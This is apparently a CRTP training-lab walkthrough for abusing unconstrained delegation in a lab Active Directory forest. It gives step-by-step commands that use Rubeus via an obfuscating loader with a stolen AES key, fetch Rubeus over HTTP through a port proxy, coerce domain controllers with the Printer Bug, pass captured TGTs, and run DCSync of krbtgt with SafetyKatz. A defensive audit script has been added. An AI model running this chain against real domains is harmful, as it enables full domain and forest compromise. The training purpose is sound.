CRTP Lab 15

Task 1

Find a server in the dcorp domain where Unconstrained Delegation is enabled.

Run InviShell and use PowerView to find machines with unconstrained delegation.

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
. C:\AD\Tools\PowerView.ps1

Get-DomainComputer -Unconstrained | select -ExpandProperty name
DCORP-DC
DCORP-APPSRV
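As an added defender-side check (not part of the lab's own material), the same enumeration done for auditing: a PowerShell snippet that lists every computer carrying the TRUSTED_FOR_DELEGATION flag and separates domain controllers, which carry it by design, from member servers such as DCORP-APPSRV, which are findings. It assumes the RSAT ActiveDirectory module is installed and the account has read access to the domain.

```powershell
# Added audit example, not taken from the lab: enumerate unconstrained delegation hosts.
# Assumes the RSAT ActiveDirectory module and read access to the target domain.
Import-Module ActiveDirectory

function Get-UnconstrainedDelegationHosts {
    param([string]$Domain = $env:USERDNSDOMAIN)

    # Fall back to the current domain when the environment variable is not set.
    if (-not $Domain) { $Domain = (Get-ADDomain).DNSRoot }

    # userAccountControl bit 0x80000 (524288) is TRUSTED_FOR_DELEGATION, i.e.
    # unconstrained delegation; the 1.2.840.113556.1.4.803 rule does a bitwise AND.
    $filter = '(userAccountControl:1.2.840.113556.1.4.803:=524288)'

    # Domain controllers legitimately carry the flag, so record them for comparison.
    $dcs = @((Get-ADDomainController -Filter * -Server $Domain).Name)

    Get-ADComputer -LDAPFilter $filter -Server $Domain -Properties OperatingSystem,LastLogonDate |
        ForEach-Object {
            [pscustomobject]@{
                Name               = $_.Name
                OperatingSystem    = $_.OperatingSystem
                LastLogonDate      = $_.LastLogonDate
                IsDomainController = ($dcs -contains $_.Name)
            }
        }
}

# Any non-DC host in this list can capture TGTs of every principal that connects to it;
# remediate by clearing the flag or moving to constrained / resource-based delegation.
Get-UnconstrainedDelegationHosts |
    Where-Object { -not $_.IsDomainController } |
    Format-Table -AutoSize
```

In the lab domain this reports DCORP-APPSRV as the only non-DC host with the flag set.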

Task 2

Compromise the server and escalate to Domain Admin privileges.

To escalate to DA privileges via unconstrained delegation, we first need to compromise a user that has local admin access on dcorp-appsrv.

Since we extracted the secrets of appadmin, srvadmin, and websvc from dcorp-adminsrv, let's check whether any of them has local admin privileges on dcorp-appsrv using Find-PSRemotingLocalAdminAccess.

Let's check for appadmin.

# ArgSplit "asktgt"

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /user:appadmin /aes256:68f08715061e4d0790e71b1245bf20b023d08822d2df85bff50a0e8136ffe4cb /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

# From the new process, we try to find if the appadmin user has admin access on dcorp-appsrv

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
. C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccess -Domain dollarcorp.moneycorp.local

dcorp-adminsrv
dcorp-appsrv

It turns out appadmin has local admin privileges on dcorp-appsrv.

To trick a high-privilege principal into connecting to a machine with Unconstrained Delegation (dcorp-appsrv), we use the Printer Bug.

Exit InviShell (the appadmin session), copy Loader to dcorp-appsrv, and set up port forwarding on dcorp-appsrv so that Loader can fetch Rubeus from the student VM and run it in monitor mode.

exit
echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-appsrv\C$\Users\Public\Loader.exe /Y

winrs -r:dcorp-appsrv cmd

netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.72
# ArgSplit "monitor"
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/Rubeus.exe -args %Pwn% /targetuser:DCORP-DC$ /interval:5 /nowrap

To force authentication from dcorp-dc to dcorp-appsrv, we can use MS-RPRN.exe from the student VM.

C:\AD\Tools\MS-RPRN.exe \\dcorp-dc.dollarcorp.moneycorp.local \\dcorp-appsrv.dollarcorp.moneycorp.local

With Rubeus monitoring the authentication, we get the captured TGT of DCORP-DC$ in base64. We can use it to Pass The Ticket with Rubeus on the student VM, and then use SafetyKatz for DCSync.

From an elevated shell:

# ArgSplit "ptt"
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /ticket:doIGRTCCBkGgAwIBBaEDAgEWooIFGjCCBRZhggUSMIIFDqADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMoi8wLaADAgECoSYwJBsGa3JidGd0GxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKOCBLYwggSyoAMCARKhAwIBAqKCBKQEggSgIj7StdN


# Use SafetyKatz to run DCSync from the same process
C:\AD\Tools\Loader.exe -path C:\AD\Tools\SafetyKatz.exe -args "lsadump::dcsync /user:dcorp\krbtgt" "exit"

Task 3

Escalate to Enterprise Admin privileges by abusing the Printer Bug!

To escalate to Enterprise Admin, we need to force authentication from mcorp-dc (the forest root DC) to dcorp-appsrv.

From dcorp-appsrv, run Rubeus in monitor mode as in Task 2, this time watching for MCORP-DC$.

winrs -r:dcorp-appsrv cmd

# To trigger authentication from mcorp-dc to dcorp-appsrv, use MS-RPRN on the student VM.
C:\AD\Tools\MS-RPRN.exe \\mcorp-dc.moneycorp.local \\dcorp-appsrv.dollarcorp.moneycorp.local

Copy the base64-encoded ticket and use it to Pass The Ticket with Rubeus on the student VM.

# ArgSplit "ptt"
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /ticket:doIF1jCCBdKgAwIBBaEDAgEWooIE0TCCBM1hggTJMIIExaADAgEFoREbD01PTkVZQ09SUC5MT0NBTKIkMCKgAwIBAqEbMBk

We can now use DCSync from this process:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\SafetyKatz.exe -args "lsadump::dcsync /user:mcorp\krbtgt /domain:moneycorp.local" "exit"